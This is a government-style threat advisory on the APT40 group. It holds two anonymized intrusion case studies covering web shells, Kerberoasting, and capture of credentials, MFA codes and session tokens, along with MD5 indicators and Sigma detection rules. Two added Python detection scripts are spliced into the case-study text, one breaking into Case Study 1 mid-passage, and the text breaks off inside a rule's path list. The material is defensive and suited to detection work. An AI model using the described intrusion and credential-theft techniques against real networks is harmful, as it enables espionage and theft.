    The PRC state-sponsored cyber group has previously targeted organizations in various countries, including Australia and the United States, and the techniques highlighted below are regularly used by other PRC state-sponsored actors globally. Therefore, the authoring agencies believe the group, and similar techniques remain a threat to their countries’ networks as well. The authoring agencies assess that this group conduct malicious cyber operations for the PRC Ministry of State Security (MSS). The activity and techniques overlap with the groups tracked as Advanced Persistent Threat (APT) 40 (also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk in industry reporting).
    This group has previously been reported as being based in Haikou, Hainan Province, PRC and receiving tasking from the PRC MSS, Hainan State Security Department.[1]

    The following Advisory provides a sample of significant case studies of this adversary’s techniques in action against two victim networks. The case studies are consequential for cybersecurity practitioners to identify, prevent and remediate APT40 intrusions against their own networks. The selected case studies are those where appropriate remediation has been undertaken reducing the risk of re-exploitation by this threat actor, or others. As such, the case studies are naturally older in nature, to ensure organizations were given the necessary time to remediate.

    To download the PDF version of this report, visit the following link, APT40 Advisory.

    Activity Summary
    APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing. The tradecraft described in this advisory is regularly observed against Australian networks. Notably, APT40 possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability. APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017.
    APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473). ASD’s ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release.

    Figure 1: TTP Flowchart for APT40 activity

    This group appears to prefer exploiting vulnerable, public-facing infrastructure over techniques that require user interaction, such as phishing campaigns, and places a high priority on obtaining valid credentials to enable a range of follow-on activities. APT40 regularly uses web shells [T1505.003] for persistence, particularly early in the life cycle of an intrusion. Typically, after successful initial access APT40 focuses on establishing persistence to maintain access on the victim’s environment. However, as persistence occurs early in an intrusion, it is more likely to be observed in all intrusions—regardless of the extent of compromise or further actions taken.

    Notable Tradecraft
    Although APT40 has previously used compromised Australian websites as command and control (C2) hosts for its operations, the group have evolved this technique [T1594]. APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group’s movements. Many of these SOHO devices are end-of-life or unpatched and offer a soft target for N-day exploitation. Once compromised, SOHO devices offer a launching point for attacks that is designed to blend in with legitimate traffic and challenge network defenders [T1001.003].
    This technique is also regularly used by other PRC state-sponsored actors worldwide, and the authoring agencies consider this to be a shared threat. For additional information, see joint advisories People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices and PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure. APT40 does occasionally use procured or leased infrastructure as victim-facing C2 infrastructure in its operations; however, this tradecraft appears to be in relative decline.

    Tooling
    ASD’s ACSC are sharing some of the malicious files identified during the investigations outlined below. These files have been uploaded to VirusTotal to enable the wider network defense and cyber security communities to better understand the threats they need to defend against.

    MD5 | Filename | Additional information (size, type)
    26a5a7e71a601be991073c78d513dee3 | horizon.jsp | 1 kB, Java Source
    87c88f06a7464db2534bc78ec2b915de | Index_jsp$ProxyEndpoint$Attach.class | 597 B, Java Bytecode
    6a9bc68c9bc5cefaf1880ae6ffb1d0ca | Index_jsp.class | 5 kB, Java Bytecode
    64454645a9a21510226ab29e01e76d39 | Index_jsp.java | 5 kB, Java Source
    e2175f91ce3da2e8d46b0639e941e13f | Index_jsp$ProxyEndpoint.class | 4 kB, Java Bytecode
    9f89f069466b8b5c9bf25c9374a4daf8 | Index_jsp$ProxyEndpoint$1.class | 3 kB, Java Bytecode
    187d6f2ed2c80f805461d9119a5878ac | Index_jsp$ProxyEndpoint$2.class | 1 kB, Java Bytecode
    ed7178cec90ed21644e669378b3a97ec | Nova_jsp.class | 7 kB, Java Bytecode
    5bf7560d0a638e34035f85cd3788e258 | Nova_jsp$TomcatListenerMemShellFromThread.class | 8 kB, Java Bytecode
    e02be0dc614523ddd7a28c9e9d500cff | Nova_jsp.java | 15 kB, Java Source

    Case Studies
    ASD’s ACSC are sharing two anonymized investigative reports to provide awareness of how the actors employ their tools and tradecraft.

    Case Study 1
    This report has been anonymized to enable wider dissemination.
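    The Tooling table gives defenders ten MD5 values and filenames to sweep for on Java servlet hosts. The following is an added example, not ASD's ACSC code, that walks directories you name and reports each file whose MD5 matches an entry in the table (a strong indicator) or whose filename alone matches (a weak one, since the same class names can be recompiled and a benign file can share a name). The hashes and filenames are copied from the table above; the directories to scan and the size cap are assumptions.

```python
"""Hunt for the web shell artefacts listed in the advisory's Tooling table,
by MD5 and by filename.

Added example for this advisory; not ASD's ACSC code. The MD5s and filenames
come from the table; what gets scanned is whatever directories are passed in.
"""
import hashlib
import os
from typing import Dict, Iterable, List, Optional, Tuple

# MD5 -> filename, copied from the advisory's Tooling table.
ADVISORY_IOCS: Dict[str, str] = {
    "26a5a7e71a601be991073c78d513dee3": "horizon.jsp",
    "87c88f06a7464db2534bc78ec2b915de": "Index_jsp$ProxyEndpoint$Attach.class",
    "6a9bc68c9bc5cefaf1880ae6ffb1d0ca": "Index_jsp.class",
    "64454645a9a21510226ab29e01e76d39": "Index_jsp.java",
    "e2175f91ce3da2e8d46b0639e941e13f": "Index_jsp$ProxyEndpoint.class",
    "9f89f069466b8b5c9bf25c9374a4daf8": "Index_jsp$ProxyEndpoint$1.class",
    "187d6f2ed2c80f805461d9119a5878ac": "Index_jsp$ProxyEndpoint$2.class",
    "ed7178cec90ed21644e669378b3a97ec": "Nova_jsp.class",
    "5bf7560d0a638e34035f85cd3788e258": "Nova_jsp$TomcatListenerMemShellFromThread.class",
    "e02be0dc614523ddd7a28c9e9d500cff": "Nova_jsp.java",
}


def md5_hex(data: bytes) -> str:
    """MD5 of a byte string as lowercase hex (the form used in the table)."""
    return hashlib.md5(data).hexdigest()


def classify(name: str, data: bytes, iocs: Dict[str, str] = ADVISORY_IOCS) -> Optional[str]:
    """'strong' on an MD5 match, 'weak' on a filename-only match, else None."""
    if md5_hex(data) in iocs:
        return "strong"
    if name in iocs.values():
        return "weak"
    return None


def scan(roots: Iterable[str], iocs: Dict[str, str] = ADVISORY_IOCS,
         max_bytes: int = 64 * 1024 * 1024) -> List[Tuple[str, str, str]]:
    """Walk the given directories and return (path, md5, strength) per hit.
    Files over max_bytes are skipped (assumed cap; the listed artefacts are
    all under 16 kB), and unreadable files are skipped rather than aborting."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for fname in files:
                path = os.path.join(dirpath, fname)
                try:
                    if not os.path.isfile(path) or os.path.getsize(path) > max_bytes:
                        continue
                    with open(path, "rb") as fh:
                        data = fh.read()
                except OSError:
                    continue
                strength = classify(fname, data, iocs)
                if strength:
                    hits.append((path, md5_hex(data), strength))
    return hits


if __name__ == "__main__":
    import sys
    # Assumed usage: point it at the servlet container's deployment and work directories.
    for path, digest, strength in scan(sys.argv[1:] or ["."]):
        print(f"{strength:6} {digest} {path}")
```

    A weak hit deserves a look at the file's contents and its creation time relative to the web server's deployment history rather than an immediate alert; a strong hit on a `.class` or `.jsp` under a live web application is the web shell persistence [T1505.003] the advisory describes and should trigger incident response for the whole host, not just removal of the file.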
    The impacted organization is hereafter referred to as “the organization.” Some specific details have been removed to protect the identity of the victim and incident response methods of ASD’s ACSC.

    Executive Summary
    This report details the findings of the ASD’s ACSC investigation into the successful compromise of the organization’s network between July and September 2022. This investigative report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40. In mid-August, the ASD’s ACSC notified the organization of malicious interactions with their network from a likely compromised device being used by the group in late August and, with the organization’s consent, the ASD’s ACSC deployed host-based sensors to likely affected hosts on the organization’s network. These sensors allowed ASD’s ACSC incident response analysts to undertake a thorough digital forensics investigation. Using available sensor data, the ASD’s ACSC analysts successfully mapped the group’s activity and created a detailed timeline of observed events.

    From July to August, key actor activity observed by the ASD’s ACSC included:
    - Host enumeration, which enables an actor to build their own map of the network;
    - Web shell use, giving the actor an initial foothold on the network and a capability to execute commands; and
    - Deployment of other tooling leveraged by the actor for malicious purposes.

    The investigation uncovered evidence of large amounts of sensitive data being accessed and evidence that the actors moved laterally through the network [T1021.002]. Much of the compromise was facilitated by the group’s establishment of multiple access vectors into the network, the network having a flat structure, and the use of insecure internally developed software that could be used to arbitrarily upload files.
    Exfiltrated data included privileged authentication credentials that enabled the group to log in, as well as network information that would allow the actors to regain unauthorized access if the original access vector was blocked. No additional malicious tooling was discovered beyond those on the initially exploited machine; however, a group’s access to legitimate and privileged credentials would negate the need for additional tooling. Findings from the investigation indicate the organization was likely deliberately targeted by APT40, as opposed to falling victim opportunistically to a publicly known vulnerability.

    Investigation Findings
    In mid-August 2022, the ASD’s ACSC notified the organization that a confirmed malicious IP believed to be affiliated with a state-sponsored cyber group had interacted with the organization’s computer networks between at least July and August. The compromised device probably belonged to a small business or home user. In late August, the ASD’s ACSC deployed a host-based agent to hosts on the organization’s network which showed evidence of having been impacted by the compromise. Some artefacts which could have supported investigation efforts were not available due to the configuration of logging or network design. Despite this, the organization’s readiness to provide all available data enabled ASD’s ACSC incident responders to conduct comprehensive analysis and to form an understanding of likely APT40 activity on the network. In September, after consultation with the ASD’s ACSC, the organization decided to denylist the IP identified in the initial notification. In October, the organization commenced remediation.

    Details
    Beginning in July, actors were able to test and exploit a custom web application [T1190] running on <webapp>2-ext, which enabled the group to establish a foothold in the network demilitarized zone (DMZ). This was leveraged to enumerate both the network as well as all visible domains.
    Compromised credentials [T1078.002] were used to query the Active Directory [T1018] and exfiltrate data by mounting file shares [T1039] from multiple machines within the DMZ. The actor carried out a Kerberoasting attack in order to obtain valid network credentials from a server [T1558.003]. The group were not observed gaining any additional points of presence in either the DMZ or the internal network.

    Visual Timeline
    The below timeline provides a broad overview of the key phases of malicious actor activity observed on the organization’s network.

    Detailed Timeline
    - July: The actors established an initial connection to the front page of a custom web application [T1190] built for the organization (hereafter referred to as the “web application” or “webapp”) via a transport layer security (TLS) connection [T1102]. No other noteworthy activity was observed.
    - July: The actors begin enumerating the web application’s website looking for endpoints[2] to further investigate.
    - July: The actors concentrate on attempts to exploit a specific endpoint.
    - July: The actors are able to successfully POST to the web server, probably via a web shell placed on another page. A second IP, likely employed by the same actors, also begins posting to the same URL. The actors created and tested a number of likely web shells. The exact method of exploitation is unknown, but it is clear that the specific endpoint was targeted to create files on <webapp>2-ext. ASD’s ACSC believes that the two IP address connections were part of the same intrusion due to their shared interest and initial connections occurring minutes apart.
    - July: The group continue to conduct host enumeration, looking for privilege escalation opportunities, and deploying a different web shell. The actors log into the web application using compromised credentials for <firstname.surname>@<organisation domain>. The actors’ activity does not appear to have successfully achieved privilege escalation on <webapp>2-ext.
    Instead, the actors pivoted to network-based activity.
    - July: The actor tests the compromised credentials for a service account[3] which it likely found hardcoded in internally accessible binaries.
    - July: The actors deploy the open-source tool Secure Socket Funnelling, which was used to connect out to the malicious infrastructure. This connection is employed to tunnel traffic from the actor’s attack machines into the organization’s internal networks, whose machine names are exposed in event logs as they attempt to use the credentials for the service account.
    - August: The actors are seen conducting a limited amount of activity, including failing to establish connections involving the service account.
    - August: The actors perform significant network and Active Directory enumeration. A different compromised account is subsequently employed to mount shares[4] on Windows machines within the DMZ, enabling successful data exfiltration. This seems to be opportunistic usage of a stolen credential on mountable machines in the DMZ. Firewalls blocked the actor from targeting the internal network with similar activity.
    - August – September: The SSF tool re-established a connection to a malicious IP. The group are not observed performing any additional activities until their access is blocked.
    - September: The organization blocks the malicious IP by denylisting it on their firewalls.

    Actor Tactics and Techniques
    The MITRE ATT&CK framework is a documented collection of tactics and techniques employed by threat actors in cyberspace. The framework was created by U.S. not-for-profit The MITRE Corporation and functions as a common global language around threat actor behavior. The ASD’s ACSC assesses the following techniques and tactics to be relevant to the actor’s malicious activity:

    Reconnaissance
    T1594 – Search Victim-Owned Websites: The actor enumerated the custom web application’s website to identify opportunities for accessing the network.
    Initial Access
    T1190 – Exploit Public-Facing Application (regarding exploiting the custom web application)
    T1078.002 – Valid Accounts: Domain Accounts (regarding logging on with compromised credentials)
    Exploiting internet-exposed custom web applications provided an initial point of access for the actor. The actor was later able to use credentials they had compromised to further their access to the network.

    Execution
    T1059 – Command and Scripting Interpreter (regarding command execution through the web shell)
    T1072 – Software Deployment Tools (regarding the actor using open-source tool Secure Socket Funnelling (SSF) to connect to an IP)

    Persistence
    T1505.003 – Server Software Component: Web Shell (regarding use of a web shell and SSF to establish access)

    Credential Access
    T1552.001 – Credentials from Password Stores (regarding password files relating to building management system [BMS])
    T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting (regarding attack to gain network credentials)

    Lateral movement
    T1021.002 – Remote Services: SMB Shares (regarding the actor mounting SMB shares from multiple devices)

    Collection
    T1213 – Data from Information Repositories (regarding manuals/documentation found on the BMS server)

    Exfiltration
    T1041 – Exfiltration Over C2 Channel (regarding the actor’s data exfiltration from Active Directory and mounting shares)

    Case Study 2
    This report has been anonymized to enable wider dissemination. The impacted organization is hereafter referred to as “the organization.” Some specific details have been removed to protect the identity of the victim and incident response methods of ASD’s ACSC.

    Executive Summary
    This report details the findings of ASD’s ACSC investigation into the successful compromise of the organization’s network in April 2022. This investigation report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40.
    In May 2022, ASD’s ACSC notified an organization of suspected malicious activity impacting the organization’s network since April 2022. Subsequently, the organization informed ASD’s ACSC that they had discovered malicious software on an internet‑facing server which provided the login portal for the organization’s corporate remote access solution. This server used a remote access login and identity management product and will be referred to in this report as ‘the compromised appliance’. This report details the investigation findings and remediation advice developed for the organization in response to the investigation conducted by the ASD’s ACSC.

    Evidence indicated that part of the organization’s network had been compromised by malicious cyber actor(s) via the organization’s remote access login portal since at least April 2022. This server may have been compromised by multiple actors, and was likely affected by a remote code execution (RCE) vulnerability that was widely publicized around the time of the compromise.

    Key actor activity observed by the ASD’s ACSC included:
    - Host enumeration, which enables an actor to build their own map of the network;
    - Exploitation of internet-facing applications and web shell use, giving the actor an initial foothold on the network and a capability to execute commands;
    - Exploitation of software vulnerabilities to escalate privileges; and
    - Credential collection to enable lateral movement.

    The ASD’s ACSC discovered that a malicious actor had exfiltrated several hundred unique username and password pairs on the compromised appliance in April 2022, as well as a number of multi-factor authentication codes and technical artefacts related to remote access sessions. Upon a review by the organization, the passwords were found to be legitimate.
    The ASD’s ACSC assesses that the actor may have collected these technical artefacts to hijack or create a remote login session as a legitimate user, and access the organization’s internal corporate network using a legitimate user account.

    Investigation Summary
    The ASD’s ACSC determined that the actor compromised appliance(s) which provide remote login sessions for organization staff and used this compromise to attempt to conduct further activity. These appliances consist of three load-balanced hosts where the earliest evidence of compromise was detected. The organization shut down two of the three load-balanced hosts shortly after the initial compromise. As a result, all subsequent activity occurred on a single host. The other servers associated with the compromised appliance were also load-balanced in a similar manner. For legibility, all compromised appliances are referred to in most of this report as a “single appliance.”

    The actor is believed to have used publicly known vulnerabilities to deploy web shells to the compromised appliance from April 2022 onwards. Threat actors from the group are assessed to have attained escalated privileges on the appliance. The ASD’s ACSC could not determine the full extent of the activity due to lack of logging availability. However, evidence on the device indicates that an actor achieved the following:
    - The collection of several hundred genuine username and password pairs; and
    - The collection of technical artefacts which may have allowed a malicious actor to access a virtual desktop infrastructure (VDI) session as a legitimate user.

    The ASD’s ACSC assesses that the actor would have sought to further the compromise of the organisation network. The artefacts exfiltrated by the actor may have allowed them to hijack or initiate virtual desktop sessions as a legitimate user, possibly as a user of their choice, including administrators.
    The actor may have used this access vector to further compromise organization services to achieve persistence and other goals. Other organization appliances within the hosting provider managed environment did not show evidence of compromise.

    Access
    The host with the compromised appliance provided authentication via Active Directory and a webserver, for users connecting to VDI sessions [T1021.001].

    Location | Compromised appliance hostnames (load-balanced)
    Datacentre 1 | HOST1, HOST2, HOST3

    The appliance infrastructure also included access gateway hosts that provide a tunnel to the VDI for the user, once they possess an authentication token generated and downloaded from the appliance. There was no evidence of compromise of any of these hosts. However, the access gateway hosts logs showed evidence of significant interactions with known malicious IP addresses. It is likely that this reflected activity that occurred on this host, or network connections with threat actor infrastructure that reached this host. The nature of this activity could not be determined using available evidence but indicates that the group sought to move laterally in the organization’s network [TA0008].

    Internal Hosts
    The ASD’s ACSC investigated limited data from the internal organization’s network segment. Attempted or successful malicious activity known to have impacted the internal organization’s network segment includes actor access to VDI-related artefacts, the scraping of an internal SQL server [T1505.001], and unexplained traffic observed going from known malicious IP addresses through the access gateway appliances [TA0011]. Using their access to the compromised appliance, the group collected genuine usernames, passwords [T1003], and MFA token values [T1111]. The group also collected JSON Web Tokens (JWTs) [T1528], which is an authentication artefact used to create virtual desktop login sessions.
    The actor may have been able to use these to create or hijack virtual desktop sessions [T1563.002] and access the internal organization network segment as a legitimate user [T1078]. The actor also used access to the compromised appliance to scrape an SQL server [T1505.001], which resided in the organization’s internal network. It is likely that the actor had access to this data. Evidence available from the access gateway appliance revealed that network traffic occurred through or to this device from known malicious IP addresses. As described above, this may indicate that malicious cyber actors impacted or utilized this device, potentially to pivot into the internal network.

    Investigation Timeline
    The below list provides a timeline of key activities discovered during the investigation.

    Time | Event
    April 2022 | Known malicious IP addresses interact with access gateway host HOST7. The nature of the interactions could not be determined.
    April 2022 | All hosts, HOST1, HOST2 and HOST3, were compromised by a malicious actor or actors, and web shells were placed on the hosts. A log file was created or modified on HOST2. This file contains credential material likely captured by a malicious actor. The /etc/security/opasswd and /etc/shadow files were modified on HOST1 and HOST3, indicating that passwords were changed. Evidence available on HOST1 suggests that the password for user ‘sshuser’ was changed.
    April 2022 | HOST2 was shut down by the organization. Additional web shells (T1505.003) were created on HOST1 and HOST3. HOST1 experienced SSH brute force attempts from HOST3. A log file was modified (T1070) on HOST3. This file contains credential material (T1078) likely captured by a malicious actor. JWTs were captured (T1528) and output to a file on HOST3. HOST3 was shut down by the organization. All activity after this time occurs on HOST1.
    April 2022 | Additional web shells were created on HOST1 (T1505.003). JWTs were captured and output to a file on HOST1.
    April 2022 | Additional web shells are created on HOST1 (T1505.003), and a known malicious IP address interacts with the host (TA0011). A known malicious IP address interacts with access gateway host HOST7.
    May 2022 | A known malicious IP address interacted with access gateway host HOST7 (TA0011). An authentication event for a user is linked to a known malicious IP address in logs on HOST1. An additional web shell is created on this host (T1505.003).
    May 2022 | A script on HOST1 was modified by an actor (T1543). This script contains functionality which would have scraped data from an internal SQL server.
    May 2022 | An additional log file on HOST1 was last modified (T1070). This file contains username and password pairs for the organization network, which are believed to be legitimate (T1078).
    May 2022 | An additional log file was last modified (T1070). This file contains JWTs collected from HOST1.
    May 2022 | Additional web shells were created on HOST1 (T1505.003). On this date, the organization reported the discovery of a web shell with creation date in April 2022 to ASD’s ACSC.
    May 2022 | A number of scripts were created on HOST1, including one named Log4jHotPatch.jar.
    May 2022 | The iptables-save command was used to add two open ports to the access gateway host. The ports were 9998 and 9999 (T1572).

    Actor Tactics and Techniques
    Highlighted below are several tactics and techniques identified during the investigation.

    Initial access
    T1190 Exploit public facing application
    The group likely exploited RCE, privilege escalation, and authentication bypass vulnerabilities in the remote access login and identity management product to gain initial access to the network. This initial access method is considered the most likely due to the following:
    - The server was vulnerable to these CVEs at the time;
    - Attempts to exploit these vulnerabilities from known actor infrastructure; and
    - The first known internal malicious activity occurred shortly after attempted exploitation attempts were made.
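    The last timeline entry, two extra open ports on the access gateway host (T1572), is the kind of change a periodic comparison of the host's firewall rules against a known baseline catches regardless of which tool the actor used to make it. The following is an added example, not ASD's ACSC code: it parses `iptables-save` output, collects the destination ports the INPUT chain accepts, and reports any not in the baseline. The dump is constructed and the baseline (HTTPS plus management SSH) is an assumption about what such a gateway should accept; the 9998 and 9999 values are the ones from the timeline.

```python
"""Compare an iptables-save dump against a baseline of expected accepted
ports, to catch firewall changes like the two extra ports opened on the
access gateway host in the timeline above (T1572).

Added example for this case study; not ASD's ACSC code. The dump below is
constructed; the baseline is an assumption. In production, feed it the real
`iptables-save` output from the host being checked.
"""
import re
from typing import Iterable, List, Set

# Constructed sample: an appliance INPUT chain after two unexpected ACCEPT
# rules were appended (ports taken from the advisory's timeline).
SAMPLE_IPTABLES_SAVE = """\
# Generated by iptables-save (constructed sample)
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 443 -j ACCEPT
-A INPUT -s 10.0.0.0/8 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 9998 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 9999 -j ACCEPT
COMMIT
"""

# "-A <chain> <matches> -j <target>" as emitted by iptables-save.
RULE_RE = re.compile(r"^-A\s+(?P<chain>\S+)\s+(?P<match>.*?)\s*-j\s+(?P<target>\S+)")
# --dport for single ports/ranges, --dports for multiport lists.
DPORT_RE = re.compile(r"--dports?\s+(\S+)")


def accepted_ports(dump: str, chain: str = "INPUT") -> Set[str]:
    """Destination ports (or ranges such as '1000:2000') that the chain
    ACCEPTs through --dport/--dports rules. Rules without a port match
    (loopback, conntrack) are ignored."""
    ports: Set[str] = set()
    for line in dump.splitlines():
        m = RULE_RE.match(line.strip())
        if not m or m.group("chain") != chain or m.group("target") != "ACCEPT":
            continue
        d = DPORT_RE.search(m.group("match"))
        if d:
            ports.update(d.group(1).split(","))
    return ports


def unexpected_ports(dump: str, baseline: Iterable[str], chain: str = "INPUT") -> List[str]:
    """Accepted ports missing from the baseline, sorted by their low end."""
    extra = accepted_ports(dump, chain) - set(baseline)
    return sorted(extra, key=lambda p: int(p.split(":")[0]))


if __name__ == "__main__":
    import sys
    dump = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_IPTABLES_SAVE
    # Assumed baseline for a VDI access gateway: HTTPS and management SSH.
    for port in unexpected_ports(dump, {"22", "443"}):
        print(f"unexpected ACCEPT for port {port} in INPUT")
```

    Run it from a scheduled job that pipes `iptables-save` into it and alerts on any output; a rule added by an intruder is then visible at the next run rather than at the next incident. The same comparison is worth doing for the FORWARD chain on hosts that route, and for the nftables equivalent where that is in use.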
    Execution

    T1059.004 Command and Scripting Interpreter: Unix Shell

    Having successfully exploited the above vulnerabilities, the group may have been able to run commands in a Unix shell available on the affected appliance. Complete details of the commands run by actors cannot be provided as they were not logged by the appliance.

    Persistence

    T1505.003 Server Software Component: Web Shell

    Actors deployed several web shells on the affected appliance. It is possible that multiple distinct actors deployed web shells, but that only a smaller number of actors conducted activity using these web shells. Web shells would have allowed for arbitrary command execution by the actor on the compromised appliances.

    Privilege escalation

    T1068 Exploitation for Privilege Escalation

    Available evidence does not describe the level of privilege attained by actors. However, using web shells, the actors would have achieved a level of privilege comparable to that of the web server on the compromised appliance. Vulnerabilities believed to have been present on the compromised appliance would have allowed the actors to attain root privileges.

    Credential access

    T1056.003 Input Capture: Web Portal Capture

    Evidence on the compromised appliance showed that the actor had captured several hundred username-password pairs, in clear text, which are believed to be legitimate. It is likely that these were captured using some modification to the genuine authentication process which output the credentials to a file.

    T1111 Multi-Factor Authentication Interception

    The actor also captured the value of MFA tokens corresponding to legitimate logins. These were likely captured by modifying the genuine authentication process to output these values to a file. There is no evidence of compromise of the “secret server” which stores the unique values that provide for the security of MFA tokens.

    T1040 Network Sniffing

    The actor is believed to have captured JWTs by capturing HTTP traffic on the compromised appliance. There is evidence that the utility tcpdump was executed on the compromised appliance, which may have been how the actor captured these JWTs.

    T1539 Steal Web Session Cookie

    As described above, the actor captured JWTs, which are analogous to web session cookies. These could have been reused by the actor to establish further access.

    Discovery

    T1046 Network Service Discovery

    There is evidence that the network scanning utility nmap was executed on the compromised appliance to scan other appliances in the same network segment. This was likely used by the actor to discover other reachable network services which might present opportunities for lateral movement.

    Collection

    Available evidence does not reveal how actors collected data or exactly what was collected from the compromised appliance or from other systems. However, it is likely that actors had access to all files on the compromised appliance, including the captured credentials [T1003], MFA token values [T1111], and JWTs described above.

    Command and Control

    T1071.001 Application Layer Protocol: Web Protocols

    Actors used web shells for command and control. Web shell commands would have been passed over HTTPS using the existing web server on the appliance [T1572].

    T1001.003 Data Obfuscation: Protocol Impersonation

    Actors used compromised devices as a launching point for attacks that are designed to blend in with legitimate traffic.

    Detection and mitigation recommendations

    The ASD’s ACSC strongly recommends implementing the ASD Essential Eight Controls and associated Strategies to Mitigate Cyber Security Incidents. Below are recommendations for network security actions that should be taken to detect and prevent intrusions by APT40, followed by specific mitigations for four key TTPs summarized in Table 1.

    Detection

    Some of the files identified above were dropped in locations such as C:\Users\Public\* and C:\Windows\Temp\*.
    These locations can be convenient spots for writing data as they are usually world writable, that is, all user accounts registered in Windows have access to these directories and their subdirectories. Often, any user can subsequently access these files, allowing opportunities for lateral movement, defense evasion, low-privilege execution and staging for exfiltration. The following Sigma rules look for execution from suspicious locations as an indicator of anomalous activity. In all instances, subsequent investigation is required to confirm malicious activity and attribution.

    Title: World Writable Execution – Temp
    ID: d2fa2d71-fbd0-4778-9449-e13ca7d7505c
    Description: Detect process execution from C:\Windows\Temp.
    Background: This rule looks specifically for execution out of C:\Windows\Temp\*. Temp is more broadly used by benign applications and thus a lower confidence malicious indicator than execution out of other world writable subdirectories in C:\Windows. Removing applications executed by the SYSTEM or NETWORK SERVICE users substantially reduces the quantity of benign activity selected by this rule. This means that the rule may miss malicious executions at a higher privilege level, but it is recommended to use other rules to determine if a user is attempting to elevate privileges to SYSTEM.
    Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary, attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.
    References: Process Execution from an Unusual Directory
    Author: ASD’s ACSC
    Date: 2024/06/19
    Status: experimental
    Tags: tlp.green, classification.au.official, attack.execution
    Log Source:
      category: process_creation
      product: windows
    Detection:
      temp:
        Image|startswith: 'C:\\Windows\\Temp\\'
      common_temp_path:
        Image|re|ignorecase: 'C:\\Windows\\Temp\\\{[a-fA-F0-9]{8}-([a-fA-F0-9]{4}-){3}[a-fA-F0-9]{12}\}\\'
      system_user:
        User:
          - 'SYSTEM'
          - 'NETWORK SERVICE'
      dismhost:
        Image|endswith: 'dismhost.exe'
      known_parent:
        ParentImage|endswith:
          - '\\esif_uf.exe'
          - '\\vmtoolsd.exe'
          - '\\cwainstaller.exe'
          - '\\trolleyexpress.exe'
      condition: temp and not (common_temp_path or system_user or dismhost or known_parent)
    False positives: Allowlist auditing applications have been observed running executables from Temp. Temp will legitimately contain an array of setup applications and launchers, so it will be worth considering how prevalent this behavior is on a monitored network (and whether or not it can be allowlisted) before deploying this rule.
    Level: low

    Title: World Writable Execution – Non-Temp System Subdirectory
    ID: 5b187157-e892-4fc9-84fc-aa48aff9f997
    Description: Detect process execution from a world writable location in a subdirectory of the Windows OS install location.
    Background: This rule looks specifically for execution out of world writable directories within C:\ and particularly C:\Windows\*, with the exception of C:\Windows\Temp (which is more broadly used by benign applications and thus a lower confidence malicious indicator). AppData folders are excluded if a file is run as SYSTEM; this is a benign way in which many temporary application files are executed. After completing an initial network baseline and identifying known benign executions from these locations, this rule should rarely fire.
    Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary, attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate.
    References: mattifestation / WorldWritableDirs.txt; Process Execution from an Unusual Directory
    Author: ASD’s ACSC
    Date: 2024/06/19
    Status: experimental
    Tags: tlp.green, classification.au.official, attack.execution
    Log Source:
      category: process_creation
      product: windows
    Detection:
      writable_path:
        Image|contains:
          - ':\\$Recycle.Bin\\'
          - ':\\AMD\\Temp\\'
          - ':\\Intel\\'
          - ':\\PerfLogs\\'
          - ':\\Windows\\addins\\'
          - ':\\Windows\\appcompat\\'
          - ':\\Windows\\apppatch\\'
          - ':\\Windows\\AppReadiness\\'
          - ':\\Windows\\bcastdvr\\'
          - ':\\Windows\\Boot\\'
          - ':\\Windows\\Branding\\'
          - ':\\Windows\\CbsTemp\\'
          - ':\\Windows\\Containers\\'
          - ':\\Windows\\csc\\'
          - ':\\Windows\\Cursors\\'
          - ':\\Windows\\debug\\'
          - ':\\Windows\\diagnostics\\'
          - ':\\Windows\\DigitalLocker\\'
          - ':\\Windows\\dot3svc\\'
          - ':\\Windows\\en-US\\'
          - ':\\Windows\\Fonts\\'
          - ':\\Windows\\Globalization\\'
          - ':\\Windows\\Help\\'
          - ':\\Windows\\IdentityCRL\\'
          - ':\\Windows\\IME\\'
          - ':\\Windows\\ImmersiveControlPanel\\'
          - ':\\Windows\\INF\\'
          - ':\\Windows\\intel\\'
          - ':\\Windows\\L2Schemas\\'
          - ':\\Windows\\LiveKernelReports\\'
          - ':\\Windows\\Logs\\'
          - ':\\Windows\\media\\'
          - ':\\Windows\\Migration\\'
          - ':\\Windows\\ModemLogs\\'
          - ':\\Windows\\ms\\'
          - ':\\Windows\\OCR\\'
          - ':\\Windows\\panther\\'
          - ':\\Windows\\Performance\\'
          - ':\\Windows\\PLA\\'
